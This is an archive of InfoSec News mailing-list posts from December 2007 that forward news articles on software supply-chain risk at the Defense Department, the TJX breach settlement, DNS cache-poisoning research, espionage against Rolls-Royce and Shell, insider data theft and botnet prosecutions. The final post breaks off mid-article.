From alerts at infosecnews.org Mon Dec 3 00:24:47 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Defense board sounds louder alarm about foreign software development Message-ID: http://www.govexec.com/story_page.cfm?articleid=38713 By Bob Brewin Govexec.com November 30, 2007 Software developed in foreign countries and used by the Defense Department and other agencies puts federal information systems at serious risk of being hacked and compromised, according to a recent report issued by Defense's top advisory board. The report [1], released last month by a Defense Science Board task force, warns that "globalization of software development where some ... U.S. adversaries are writing the code that ... [Defense] will depend upon in war creates a rich opportunity to damage or destroy elements of the warfighter's capability." Defense relies heavily on commercial off-the-shelf and custom-built software developed in countries such as India, China and Russia, so it can quickly and cheaply take advantage of the latest advances designed for global markets rather than relying solely on U.S. developers. But the task force's report, "Mission Impact of Foreign Influence on DoD Software," concluded that relying on software developed in other countries "presents an opportunity for threat agents to attack the confidentiality, integrity and availability of operating systems, middleware and applications that are essential to operations of U.S. government information systems and the DoD." The report emphasized that "the most direct threat is foreign corruption of software: insertion by the developer of malware, backdoors and other intentional flaws that can later by exploited." The fear that software developed in foreign countries that government agencies use in information systems may contain backdoors or programs that allow hackers to steal information or take down systems goes back to the late 1990s, when federal agencies hired foreign contractors to rewrite code to keep systems from malfunctioning when the date changed to the year 2000. But the Defense Science Board report is the first formal acknowledgement since 1999 at the top levels within Defense that such a security risk exists and highlights the seriousness of that risk. A 1999 Defense Science Board task force report titled "Globalization and Security" [2] stated, "DoD's necessary, inevitable and ever increasing reliance on commercial software -- often developed offshore by software engineers who have little, if any allegiance to the United States -- is likely amplifying DoD vulnerability to information operations against all such systems incorporating such software. The 2007 task force report echoes the 1999 warnings about the potential of malicious code in commercial software threatening Defense systems. The 1999 report concluded, "Malicious code, which would facilitate system intrusion, would be all but impossible to detect through testing, primarily because of software's extreme and ever increasing complexity. ... Increased functionality means increased vulnerability." But the latest warnings come with hard evidence that Defense systems already have been infiltrated. In his introductory letter for the 2007 report, Robert Lucky, the task force chairman and a former vice president of Telcordia Technologies (formerly Bell Labs), wrote: "Low level malicious technologies have been employed to successfully penetrate sensitive, unclassified DoD systems despite efforts by DoD to maintain information security and assurance." The board also reported that Defense faces a security threat from "foreign adversaries' corruption of the supply chain. Commercial development processes make no guarantees about the purity (or lack of corruption) of the supply chain, nor could they reasonably do so. The overall opaqueness of the software development supply chain and the complexity of software itself make corruption hard to detect." Defense faces "a difficult quandary in its software purchases in applying intelligent risk management, trading off the attractive economics of COTS and of custom code written offshore against the risks of encountering malware that could seriously jeopardize future defense missions," the board concluded in the report. "Current systems designs, assurance methodologies, acquisition procedures and knowledge of adversarial intentions "are inadequate to the threat." Despite these concerns, the board task force recommended that Defense continue to "procure from, encourage and leverage the largest possible global competitive marketplace consistent with national security." Marketplace realities dictate the globalization of information technology, which provides Defense with cost saving and market innovation, and the board pointed out that the greatest threat to Defense systems comes from custom code written for specific projects or programs, not COTS software packages from companies such as Microsoft. The board's conclusion dovetails with a Center for Strategic and International Studies report [3] released in March. In its forward, Philip Bond, president and chief executive officer of the Information Technology Association of America, wrote, "The information technology industry is global. Corporations based at home and abroad depend on a worldwide supply chain to deliver and develop the very best products to the U.S. government." Restricting Defense to software written in the United States would provide an advantage to "our adversaries jockeying for a position on the battlefields of cyberspace," Bond noted. The board's task force said Defense and the intelligence community need to develop polices and procedures to ensure the integrity of software used in critical information systems, but warned that "the problem of detecting vulnerabilities is deeply complex, and there is no silver bullet on the horizon." Ensuring the integrity of code in complex Defense systems, such as the Army's Future Combat Systems, which will use millions of lines of code to stitch together multiple battlefield systems, presents a particular challenge, according to an appendix to the board report. About 27 million lines of source code used in FCS are either COTS code or open source. The FCS program office has determined there is a "low-to-moderate risk that malicious code could be inserted into the FCS Master Software Baseline and exploited," but, the report added, The Army has decided to handle the problem of potentially malicious code by assuming that the "profit motive will assure clean code in 'shrink wrapped' [consumer] software." The Army also has decided to accept foreign software for areas not critical to the performance of the FCS System of Systems Common Operating Environment, according to the report, and plans to make blind buys of software so the vendor does not know it has been purchased for use in FCS. The report said the Army has no automated tools that can detect all malicious code and line-by-line inspection in FCS is not feasible. Philip Coyle, senior adviser with the Center for Defense Information, a security policy research organization in Washington, said the only reason the Army is not conducting line-by-line inspection of code is because Boeing Co., the FCS lead systems integrator, "doesn't want to do it, and the Army doesn't want to have to pay them to do it. "For the Army to say it is not feasible is nonsense," said Coyle, who served as assistant secretary of Defense and director of its operational test and evaluation office from 1994 to 2001. "Of course it's feasible. Tedious? Yes, but they're going to have to do it eventually when problems develop in FCS software that was assembled from a wide variety of sources that turn out not to work effectively together in the overall system-of-systems." Coyle added, "Boeing will need to examine supplier source codes from the start. Waiting until U.S. soldiers on the battlefield can prove that a supplier has failed will be too late." Boeing officials declined to answer a query about inspecting FCS software code, deferring to the Army due to the "sensitivity" of the issue. Paul Mehney, an Army FCS spokesman, said the program has "a robust information assurance plan in place. Potential threats are well known and well understood, and processes, plus leading-edge technology, will be used to address the threats. Additionally, as consistent with Army regulations and acquisition policy, foreign ownership, control or influence will be taken into account prior to software development, integration or purchase." Ed Hammersla, chief operating officer of Trusted Computer Solutions in Herndon, Va., which supplies software used across Defense and the intelligence community, said automated tools can help the Army examine its FCS software. In addition, he said, TCS writes all its code in the U.S. and makes a profit. The Defense Science Board recommended that Defense could better ensure the integrity of custom software by requiring all custom code written for its systems deemed mission critical be developed by U.S. citizens holding security clearances. ITAA's Bond said he partially agreed with that suggestion, but added, "We're very interested in where they draw the line on what is critical." The board report said the ability to examine COTS software source code would be a big help in detection of malware, but pointed out that such an approach would be expensive and could pose a risk a vendor's intellectual property. Scott Charney, Microsoft corporate vice president at Trustworthy Computing in Redmond, Wash., said his company gives all governments worldwide, including the U.S. government, access to its source code. The board's task force also recommended that Defense gain insight into the processes vendors use to develop COTS software so it has meaningful assurance that software code isn't being tampered with. The board called for a product evaluation regime that is capable of reviewing vendor development processes and rendering a judgment about the ability of the vendor to produce secure software. The report also said the department must assess the tools vendors use to identify vulnerabilities and allow Defense personnel to interview developers. Charney said Microsoft has advocated since 2004 a focus on a vendor's actual development t process and use of Security Development Lifecycle policies and tools to reduce software vulnerability rates. Charney said Microsoft's SDL enforces a number of technical and policy controls to limit and monitor access to its source code. Additional processes included in the SDL, such as automated and manual reviews and testing, "provide other mechanisms that would make an attempt to tamper with our source code even more difficult," he said. "The SDL embeds security and privacy milestones at every stage of the development process." As part of the SDL, Charney said Microsoft conducts code reviews before the company ships software, uses independent test teams and automated tools to test security, and conducts penetration testing by independent third parties, in some cases. Charney said developing using these processes underscores the fact that software security has less to do with where it is written than how it is written. "Both secure and less secure software can be written anywhere," he said. "Because the goal is to produce more secure software, it is critically important that vendors leverage the best talent available and that talent may be located both inside and outside the United States." Andy Kendzie, a spokesman for SAP in Newtown Square, Pa., said the board's report pointed out that software assurance should be judged according to the vendor's actual development process and not merely its location. He added that while SAP's general software packages are developed in a global environment, "software for highly sensitive customers is handled in U.S.-based secure environments." ITAA's Bond agreed that Defense needs more insight into software vendors' development processes, but not to the extent that impedes the ability of software vendors to innovate. Chris Fountain, chief executive officer of SecureInfo, a McLean, Va., provider of information assurance software to Defense and other federal users, said Defense should be able to "look over the shoulder "of software developers. Bond said any risks inherent in offshore development need to be balanced against global software innovations, which have "tremendously improved" U.S. warfighting capabilities. [1] http://www.acq.osd.mil/dsb/reports/2007-09-Mission_Impact_of_Foreign_Influence_on_DoD_Software.pdf [2] http://www.acq.osd.mil/dsb/reports/globalization.pdf [3] http://www.csis.org/media/csis/pubs/070323_lewisforeigninflubook.pdf From alerts at infosecnews.org Mon Dec 3 00:25:13 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] California gov site invaded by smut and malware again Message-ID: http://www.theregister.co.uk/2007/12/01/government_sites_serve_malware/ By Dan Goodin in San Francisco 1st December 2007 Raising troubling questions about the security of America's government websites, more domains ending in .gov have been found hosting links that push porn and malware. They include the Marin County Transportation Authority, which has has watched its site get hacked at least twice before. In early October the domain forced the shutdown of all California government websites until admins could remove the links. A week after the sites were disinfected, the rogue pointers returned. On Friday, more than 24 hours after this post [1] from Sunbelt Software first reported the reemergence of the links, the gov site was riddled with at least a dozen pages that, when clicked, redirected users to smut sites. Users then got a messaging saying they had to install a special codec in order to view the content. The codecs contain Trojans that install malware. By Friday evening in California, the tainted pages were finally removed, and the executive director of the agency apologized for the problem. The other site actively pushing smut and malware at the time of writing was USAid, a federally operated agency that extends aid to countries recovering from disasters. Perhaps they should attend to their own affairs first. Over the past several months, the poisoning of search caches belonging to Google and other search engines has emerged as a chief tactic by miscreants in inflating rankings of their malicious websites. At the moment, Google security pros are scrambling to eradicate a flood of malicious links. Problem is, the purveyors of smut and malware are quickly able to taint the cache with a new batch of domains. The whack-a-mole battle finally prompted Google to issue this request for help from its users. The infections of the gov sites, which are easily documented by these two Google searches (safe to click if you don't mind "porn" in your url, but you probably shouldn't click on any of search results), appear to be yet another attempt to boost the rankings of the malicious sites. Dianne Steinhauser, executive director of the Marin County Transportation Authority, said she thought the problem was fixed in mid September, after her agency dumped its old web host, StartLogic, and contracted with a new one. "Even though we quit any web hosting with them, they had a publicly accessible web page with our name on it," she told The Register. "They still had a web service under our name, and that was a complete surprise." Hackers were able to create the porn- and malware-infested pages by infiltrating StartLogic's system, she said. The pages became inaccessible after her office directed the web host to remove the web-accessible service, she said. "I am exceptionally apologetic for anyone that was contaminated by virtue of our name," she said. Attempts to reach representatives of StartLogic and USAid were not successful. [1] http://sunbeltblog.blogspot.com/2007/11/porn-back-on-cagov-sites-oh-this-is-not.html From alerts at infosecnews.org Mon Dec 3 00:25:37 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] TJX agrees to reimburse banks Message-ID: http://www.boston.com/business/globe/articles/2007/12/01/tjx_agrees_to_reimburse_banks/ By Ross Kerber Globe Staff The Boston Globe December 1, 2007 Framingham retailer TJX Cos. agreed to reimburse banks up to $40.9 million as a result of the largest data breach in history, which compromised as many as 100 million credit and debit card accounts before it was discovered at the end of last year. TJX, the parent of discount chains including TJ Maxx and Marshalls, reached a deal with credit card network Visa Inc. to pay some of the costs of reissuing cards and covering fraud losses at banks that issue Visa products, the two companies said yesterday. TJX also said it would help promote new security standards that Visa, MasterCard Inc., and banks have struggled to persuade merchants to accept. In return, the banks would agree not to sue TJX or its partners, and Visa would suspend some fines it levied after the breach, the companies said. The unprecedented terms demonstrate that retailers, banks, and card companies realize they must stop blaming one another for security lapses in an industry that handled $3.5 trillion worth of transactions last year, said Mary Monahan, partner at Javelin Strategy & Research in California. "We have a merchant and a card company saying, let's end the finger-pointing here," Monahan said. "Basically, they're recognizing consumers are tired of these data breaches and want to be protected," Monahan said. In a recent survey of 1,200 debit and credit card users, Javelin found 40 percent of the people surveyed had at least one card compromised in the past year, a level that could potentially erode confidence in the payment networks. In a statement, Ellen Richey, Visa's head of global risk management, said, "This agreement demonstrates the importance of retailers and the payment card industry working together to protect cardholder data. . . . We hope one outcome of this resolution is recognition that a greater investment in security is good business." TJX president and chief executive Carol Meyrowitz said in a statement her company has improved its own security since the breach. "We have also learned about the heightened security risks that exist across the entire US retail and banking industries as a result of today's high tech criminals. We believe that cooperative action is required by all banks, payment card companies and merchants to better protect customer payment card data, and we look forward to working together with Visa to further this goal." Visa is the largest of the payment card networks, with more than 1.6 billion cards in circulation. Yesterday's terms were unique, Monahan said, since negotiations following a data breach rarely include a direct deal between a merchant and a card network. Monahan said she expects MasterCard may make a similar deal with TJX and banks. A MasterCard spokesman said it wouldn't comment. Banks that are part of the Visa network and make up at least 80 percent of the accounts affected by the TJX breach must accept the agreement before it becomes valid, and it would not cover some foreign losses. TJX's breach had become a flashpoint for the payments industry amid a growing threat from hackers. Beginning in January, the company and outside investigators disclosed how intruders were able to penetrate the store's data network, apparently by intercepting wireless transmissions at stores in Florida, and download account numbers that have been used to conduct fraudulent purchases worldwide. So far the only convictions involve a group of low-level criminals in Florida that used some of the numbers to make purchases at local chain stores. TJX has said at least 45.7 million payment card numbers were compromised. Visa and MasterCard won't comment, but the total impact of up to 100 million compromised accounts is spelled out in court filings recently unsealed. TJX still faces lawsuits from New England banks seeking to recover the costs of issuing cards following the breach. Filings in that litigation showed Visa had issued $880,000 in penalties against the bank that processed payments at TJX stores, Fifth Third Bancorp of Ohio, citing the stores' security failures. Other filings in that case described numerous computer-security problems at TJX, including a lack of firewalls to protect data and a reliance on an outdated wireless-security protocol that is more vulnerable to hackers. As part of yesterday's deal, Visa said it would waive certain fines against Fifth Third and move the money into the broader recovery fund. The fund is meant to cover the costs banks faced for fraud losses and expenses like reissuing cards, though a Visa spokeswoman declined to give details on the total costs to banks. Visa said banks could expect more reimbursement if they agreed to the deal than they could expect under existing antifraud programs. Fifth Third also is part of the settlement. Another part of the deal would have TJX help promote tougher security standards that Visa and other card networks wanted large merchants to meet by Sept. 30 of this year. Only 65 percent did so, according to Visa's most recent figures. TJX had previously said it faced costs of $256 million as a result of the breach, and it has set money aside for those costs. Yesterday, it said its estimates included the potential $40.9 million payment to banks. Copyright 2007 Globe Newspaper Company. From alerts at infosecnews.org Mon Dec 3 00:29:33 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] DNS hacked again with poisoning attack Message-ID: http://computerworld.co.nz/news.nsf/scrt/C5117F8EF8F89577CC2573A200809036 By Roger A Grimes San Francisco 3 December, 2007 Amit Klein, of Israeli security company Trusteer, recently released details on DNS server cache poisoning attacks that affect both BIND (Berkeley Internet Name Domain) and Windows DNS servers. It goes to show that every time you think a problem with a well-known protocol or service has been solved, it may not be. DNS has been with us since 1983 nearly as long as the internet. And although DNS RFCs have come and gone, DNS is still very similar to its original specifications. Certainly it has grown in feature set and complication, but it still has the same underlying security problems it did when it was invented by Paul Mockapetris. The biggest problem is the lack of default authentication. Several security mechanisms have been created for DNS with varying degrees of success (and failure) to solve the authentication problem, but it is still relatively easy to fake a DNS packet to either a DNS server or an unwitting client. Klein's last find involved two discoveries, both of which allow important parts of a DNS server packet to be forged with trivial effort. The first implementation error involves the DNS UDP source port. Although it should be randomised to prevent forging, it turns out that the source port never changes the whole time the DNS server is up and running. The second, and more important, problem is the trivial predictability of the transaction ID value. Both errors allow DNS server packet information to be predicted and forged. An attacker can send a malicious web page link and induce an end-user to click on the link. The clicked link sends off a DNS client query, which can be forged, sending the end-user to a bogus location. DNS has been found vulnerable in the same way before. In fact, Klein laments, "It is saddening to realise that 10-15 years after the dangers of predictable DNS transaction ID were discovered" that DNS software is still susceptible to transaction ID exploitation. Klein reported his findings to BIND's caretakers, the Internet Software Consortium (ISC), in late May and to Microsoft in April. Both the ISC and Microsoft have released patches or updated software. Thanks are due to Amit Klein for his research and responsible disclosure. Overall, Microsoft's DNS implementation has been relatively secure. The last major security update to Windows DNS was in Windows 2000 SP2 and SP4, as well as Windows Server 2003 (nearly five years ago). BIND is the most popular version of DNS server software used on the internet, and its overall security track record has been a bit more active over the years, as one would expect with more popular software. BIND versions 8.x and 9.x have had at least six different vulnerabilities published. The most secure version of DNS is considered djbdns, named after its author, Dr Dan J Bernstein, one of the most prominent voices for security over functionality in computer software. Although djbdns (also known as tinydns for one of its daemons) is not nearly as functional as Windows DNS or BIND, it is run by some of the world's largest companies. Dr Bernstein claims that more than 1.8 million .com addresses use djbdns. And though Dr. Bernstein has been offering a US$500 (NZ$657) reward to anyone who can find an error in its 7,000 instructions, there has yet to be a successful claim. Unfortunately, djbdns is built only for Unix and could not be used efficiently to support an Active Directory domain. Besides making sure your DNS servers are running up-to-date versions of DNS, I think Klein's findings bring up another interesting point. Open source advocates are always touting how open source software allows programming and security bugs to be found faster than with closed source software. It certainly makes sense there's source code to review, and more eyeballs to review it. But as Klein's research shows, it doesn't make that much of a difference. In the 10 to 15 years that have gone by, nobody (publicly) found the bugs in either the closed source or open source versions. Both errors went undetected for more than a decade until one person got interested in the research. There are dozens of cases just like this, where open source bugs remained undicovered for a decade or more, until one lone individual on their own personal quest did some digging. You can look at any of the popular protocols (such as SMTP, SNMP, HTTP, FTP, ASN.1, and so on) and find vulnerabilities that went undiscovered for over a decade. Heck, people are still finding problems in IPv4 packets that have been around for 20-odd years. And as far as I can tell, whether or not the product was open source didn't really play a part in the finding or the fix, albeit the open source fixes are consistently coded faster when the problem is located. What mattered most was a single person (or company) that cared enough to investigate. From alerts at infosecnews.org Mon Dec 3 00:30:00 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Secrets of Shell and Rolls-Royce come under attack from China's spies Message-ID: http://business.timesonline.co.uk/tol/business/markets/china/article2988228.ece By James Rossiter The Times December 3, 2007 Rolls-Royce and Royal Dutch Shell have fallen victim to Chinese espionage attacks, The Times has learnt. Sustained spying assaults on Britains largest engineering company and on the worlds second-biggest oil multinational occurred earlier this year as part of a campaign to obtain confidential commercial information, sources said. News of the attacks on Rolls-Royce and Shell comes after a warning by Britains security services that China is sponsoring espionage against vital parts of the British economy, including breaking into big companies computer systems. It is understood that Chinese-backed computer hackers broke into the internal computer network of Rolls-Royce in an attack that a security source said nearly took them out. Rolls-Royce engines are widely used by many of the worlds largest airlines and are deployed in transport vehicles of many Armed Forces in Nato, including those of Britain and the United States. Shell, an Anglo-Dutch group, had to deal with a spying ring in Houston, Texas, security sources told The Times. Chinese nationals working for the company were preyed upon by state-backed operatives hoping to obtain confidential pricing information for its operations in Africa, the sources said. African countries have been targeted by international oil companies in the commercial battle to tap into vast new oil reserves needed to support both the developed economies of the West and the rapidly expanding economy of China, which has vast coal reserves but little oil and gas. The infiltration of the Rolls-Royce computer server was described as a virtual attack, a source said: The Chinese the Peoples Liberation Army - have been up to it for a good while, but it has really come to the fore recently. They tried to get inside Rolls-Royce their IT systems. Jonathan Evans, Director-General of MI5, has sent a letter to 300 chief executives and security chiefs in banks and accounting and legal firms telling them that they are under attack from Chinese state organisations, The Times revealed this weekend. A summary of the MI5 warning, posted on the website of the Centre for the Protection of the National Infrastructure, says: The contents of the letter highlight the following: the Director-Generals concerns about the possible damage to UK business resulting from electronic attack sponsored by Chinese state organisations, and the fact that the attacks are designed to defeat best-practice IT security systems. It is understood that Rolls, in common with most other networks, has several layers of firewalls, with the most confidential information, thought to contain engine designs and repair codes, at the centre. The infiltration of the Rolls network is thought to have occurred remotely after a specially tailored Trojan, a software code wrapped up in a virus, was downloaded into the site, allowing information to be relayed back out of the companys IT server. It is thought that the infiltration occurred in the UK. Rollss IT network extends, however, to its international operations, including Scandanavia and the United States. The source said: They did not get enough inside, but it was a sufficiently big attack to get very worried. They got to the so-called not very important information before being rooted out. Shell is understood to have uncovered a special interest group in Houston consisting of its Chinese nationals, who were encouraged to meet socially after work. The networking group was, however, a front for recruiting Chinese nationals. In what security experts described as a typical form of social engineering, there was targeting of Chinese workers whose families were still in China. They were told to help for the good of the Motherland, the source said, adding: It was a form of threat. This particular European oil company was made aware and uncovered the spying operation, where the Chinese were put under moral pressure to give information. Rolls-Royce and Shell declined to comment. Garrod Haggerty, forensic technology partner in PricewaterhouseCoopers, the accounting firm, said that any companys IT network infrastructure should be robust, protected by firewalls and multi-layers of security to make it difficult to launch an all-out attack on a network. From alerts at infosecnews.org Tue Dec 4 02:18:48 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Blind Hacker Says He's No Friend of Convicted SWATters Message-ID: http://blog.wired.com/27bstroke6/2007/12/blind-hacker-sa.html By Kevin Poulsen Wired.com December 03, 2007 The FBI is circling around a blind 17-year-old phone hacker in Boston suspected of being the brains behind a gang of phone phreaks who sent police SWAT teams bursting into the homes of party line foes. But the teen, known on the lines as "Li'l Hacker," says he actually helped the FBI bust the gang's ringleader, 40-year-old Stuart Rosoff, who he describes as an enemy. "I'm actually against those people," the teenager told THREAT LEVEL in a phone interview. "Mr. Rosoff and I are at odds ... He actually came after me and disconnected my phone service, but of course I had it turned back on instantly." Because he is a minor, and hasn't been charged with a crime, THREAT LEVEL is not reporting Li'l Hacker's real name. He's identified in court documents by the initials M.W. Blind from birth, Li'l Hacker admits to a deep and abiding interest in telecommunications from the age of eight. He can identify touch-tones by sound, commit vast amounts of information to memory in an instant, and he once ordered manuals for DMS and #5 ESS switching gear then paid a transcription service to convert them to Braille. But, contrary to the FBI's allegations in court documents, the teenager never helped Rosoff and other SWATters use a Caller ID spoofing service to phone in fake hostage reports to police, he claims, or use social engineering skills to obtain information on the gang's targets. "If I get charged, to be honest with you dude, I'm not going to hold anybody responsible for anything that I've done," he says. "I don't do SWATs, that's the thing." Stuart Rosoff of Cleveland, Ohio (left, in a 2004 mugshot) pleaded guilty to one count of conspiracy last month in federal court in the Northern District of Texas. In his plea deal, he stipulated that he worked with Li'l Hacker to obtain "telephone numbers, pass phrases, employee identification numbers, and employee account information used by the conspirators by various means including through 'social engineering' or pretexting of telephone calls to telecommunications company employees, 'war dialing', trafficking in pass phrases and access information with other phone 'phreakers,' etc." Li'l Hacker, though, says he told the FBI all about Rosoff, and confessed co-conspirator Guadalupe Santana Martinez, when two agents interviewed him last year. "Not snitching, merely revenge," he says. The pair had targeted his mother, he says, phoning her up and threatening to call the Secret Service on the family. "She didn't know what was going on because she didn't know what I was involved in." In court documents, the FBI accuses Li'l Hacker of, in effect, hacking with his voice. He allegedly made more than 50 pretext phone calls to the Verizon Provisioning Center in Irving, Texas, "and obtained unauthorized access to the computers located there, and used the access to obtain telecommunications services including Caller I.D. blocking and call forwarding." He says he didn't do it. "I wouldn't do it directly if I was going to ... If I were to do that, hypothetically speaking." The FBI also says the teen has the ability to listen in on phone calls -- he declined to comment on that. He also allegedly gained access to the network operations center of Frontier Telecommunications in Rochester, New York, in October and November 2006. Li'l Hacker says he really just called a mysterious phone number somebody gave him in a chat room. "I made a mistake and dialed into a number, and apparently it was the NOC," he says. "I didn't log into anything ... I heard a tone, and said, 'What the hell is this?' And I just hung up." He says the dialup wasn't even a computer modem. He knows, because he can identify different types of modems by ear. " I know the songs." Li'l Hacker has some light perception, and he attends a local high school with sighted students, using a PAC Mate portable Braille display. He has not been charged with a crime, but he turns 18-years-old in April, and some of his friends are worried. Counting Rosoff, three people have pleaded guilty in the SWATting case: Martinez last April, and co-defendant Angela Roberson in October. All three have named Li'l Hacker as a co-conspirator. Two other defendants, Jason Trowbridge and Chad Ward, are set for trial in Texas this month. From alerts at infosecnews.org Tue Dec 4 02:19:04 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Inside Microsoft's security war room Message-ID: http://www.news.com/8301-13860_3-9827124-56.html Posted by Ina Fried December 3, 2007 REDMOND, Wash. -- Tired of having to fight for a free conference room, Microsoft's security chief, Mike Nash, decided in early 2005 that the company needed a dedicated "war room" where his team could handle emergency responses. And while he was at it, why not have two? That way, the folks working on fixing a security crisis could have a little breathing room from those drafting the public and customer communications around the issue. "They were tired of the communications people hearing of things that were half-baked," Nash said. The Microsoft Security Response Center (MSRC) was completed in June 2005. The engineering conference room includes four flat-panel screens that can display live TV or a computer screen as well as a couple dozen chairs, though the place is often standing-room-only in a real crisis. The war room is just one of a number of changes Microsoft has made over the years, usually the result of a lesson learned the hard way through some work or other outbreak. In part one of a three-part series starting Monday, I take a look back at those painful lessons and how they have shaped Microsoft's current practices. On Tuesday, I'll look at the role of the human element in trying to keep software secure. And on Wednesday, I'll look at some of the people Microsoft counts on to keep its products safe. Each day there will be a blog too, going into more depth on one issue raised by that day's story. While most of the room's accoutrements are practical--food, a world map, and clocks showing the time around the world, there is also a photo of actor Harvey Keitel. That's courtesy of Christopher Budd, who used to work as part of the security response effort. "Back in 2001, I joked about how working to protect customers in the MSRC was a lot like being Harvey Keitel's character, "The Wolf," in Pulp Fiction," said Budd, who now works on Microsoft's privacy team. "Just like his character, I said, you're doing a hard job, and doing it right means you have to remain calm in a crisis and help others stay calm. When you do that, you help everyone stay focused on solving the problem." To me, "The Wolf" seems like an odd choice for a company that is looking to be more transparent. Wasn't his role in the movie to help clean up after a murder so that the rest of the world would not know what had transpired? From alerts at infosecnews.org Tue Dec 4 02:19:19 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] IT pro admits to stealing 8.4M consumer records Message-ID: http://www.channelregister.co.uk/2007/12/04/admin_steals_consumer_records/ By Dan Goodin in San Francisco 4 Dec 2007 A senior database administrator for a consumer reporting agency in Florida has admitted stealing more than 8.4 million account records and selling them to a data broke. He netted $580,000 over five years from the scheme. William Gary Sullivan, a DBA for Fidelity National Information Services, faces up to 10 years in federal prison and $500,000 in fines, although prosecutors agreed to recommend a more lenient sentence in exchange for his guilty pleas. He's also required to surrender all remaining proceeds and pay restitution to his victims. Working for a subsidiary called Certegy Check Services, Sullivan used his access to Fidelity's database on to pilfer records that included individuals' names, addresses and financial account information, according to court documents. To cover his tracks, he incorporated a business called S&S Computer Services, which sold the data to an unindicted co-conspirator. The unidentified cohort, according to authorities, then resold the consumer information to direct marketers, including one called Strategia Marketing, which also went by the name Suntasia. The scheme first came to light in July, when Fidelity disclosed that an employee absconded with 2.3 million records [1]. Fidelity was alerted to the theft by a retail customer, which noticed a "correlation between a small number of check transactions and the receipt by the retailer's customers of direct telephone solicitations and mailed marketing materials". Fidelity later raised the estimate to 8.5 million records. The company has said it is unaware of any identity theft or fraudulent financial activity resulting from the theft. Rather, it believes the stolen records were used for marketing purposes. [1] http://www.theregister.co.uk/2007/07/04/fidelity_employee_steals_records/ From alerts at infosecnews.org Tue Dec 4 02:19:35 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Teen hacker has mild autism Message-ID: http://www.nzherald.co.nz/section/story.cfm?c_id=5&objectid=10479730 By Juliet Rowan December 03, 2007 The teenager at the centre of an international cyber crime investigation has Asperger's syndrome, a mild form of autism often characterised by social isolation but great intelligence and talent in a particular area. Owen Walker's mother yesterday told the Herald that her son had the condition and that police investigating allegations that he is the mastermind of an international "bot-net" ring were aware of the fact. Speaking at the family home in Whitianga, Shell Moxham-Whyte said she had "no idea" of the 18-year-old's alleged involvement in the ring, which the FBI believes has infected more than one million computers. She said that the family had been advised not to speak publicly and that her son was now staying with relatives elsewhere. Mrs Moxham-Whyte said he and the family had come under intense pressure since it was revealed on Saturday that he was the cyber figure Akill whom the FBI considered "the ringleader of an international bot-net coding group". A bot-net is a network of computers under the command and control of a criminal "bot-herder" who uses the network to commit cyber crimes or rents it to other cyber criminals. It is understood that Walker is now staying in Auckland. Police have already interviewed the 18-year-old and plan to question him again once tests have been carried out on computers seized from his Whitianga home on Wednesday. They have been working on the case since February with the FBI. Friends and employers have praised Walker as a brilliant computer programmer and the police national electronic crime laboratory manager, Maarten Kleintjes, said he was "very, very bright in terms of his ability to be able to produce that sort of code". The teenager has lost his job as a programmer at Trio Software Development but company director Glenn Campbell told the Herald he believed Walker did not actively seek trouble or illegal activity. Friends have described him as a loner and said he was bullied at Mercury Bay Area School before he left in Year 9. Mrs Moxham-Whyte said her son was an intelligent boy who had loved computers from a young age. He had done correspondence school after he left Mercury Bay. Asked if she knew whether he had been profiting from involvement in a criminal bot-net, she said, "I can't say any more". She confirmed that her son's surname was Walker, after the Weekend Herald was told it was Wilson. Owen is also known by "Snow Whyte" and "Snow Walker". From alerts at infosecnews.org Tue Dec 4 02:19:50 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Cybercrime agency faces cuts as computer raid threats grow Message-ID: http://business.timesonline.co.uk/tol/business/industry_sectors/technology/article2994807.ece By Rhys Blakely and Sean O'Neill The Times December 4, 2007 Staff cuts at the government agency that tackles cybercrime will leave British businesses vulnerable to attack from criminals and industrial espionage, experts say. It has emerged that the Serious Organised Crime Agency (Soca), formed last year, will have to shed up to 400 staff when the Home Office announces its policing budget this week. The Government is also being criticised for last years merging of the National Hi-Tech Crime Unit (NHTCU), the police division formed in 2001 to deal with cybercrime, with Soca. The move, which experts say lessened Britains defences, went ahead despite evidence that web-based threats to companies were escalting. Research released yesterday by Finjan, a web security company, highlighted an increased volume of cyber attacks on British companies from China. In particular, Finjan investigated an attack that used zero-day exploits - malicious software for which there are no security patches - that was designed to steal confidential information. It said that it had traced one of the sources of the attacks to a website that belongs to a Chinese government office. On Saturday, The Times disclosed that the Director-General of MI5 had written to businessmen with a warning that they were being attacked by Chinese cyberspies. Soca was hailed as Britains answer to the FBI when it was launched last year by Tony Blair. However, it is expected to lose between 200 and 400 of its 4,400 staff. Ian Brown, of Oxford University, a cyber-espionage expert, said that British businesses were more vulnerable than they need to be because of the merger and planned job cuts. It is apparent now to many people that the merger . . . was a mistake, he said. Business figures claim that the merged group is excessively secretive and have criticised it for not producing results. Soca took over the functions of the National Crime Squad, the National Criminal Intelligence Service and NHTCU, as well as much of the work carried out by HM Customs law enforcement division. Its priority areas are drugs and fraud, but it is understood that the Home Office wants the agency to concentrate more on human-trafficking. Critics say that leaves cybercrime and web-based industrial espionage too far down the agenda. The Metropolitan Police wants to establish a new cybercrime unit. From alerts at infosecnews.org Wed Dec 5 00:20:01 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] FBI Cracks Down (Again) on Zombie Computer Armies Message-ID: Forwarded from: Dude VanWinkle On Nov 30, 2007 4:14 AM, InfoSec News wrote: > http://blog.wired.com/27bstroke6/2007/11/fbi-cracks-down.html > > By Ryan Singel > Wired.com - Threat Level > November 29, 2007 > > The FBI announced Thursday it had indicted or successfully prosecuted > eight individuals in a crack down on black hat hackers who use armies > of zombie 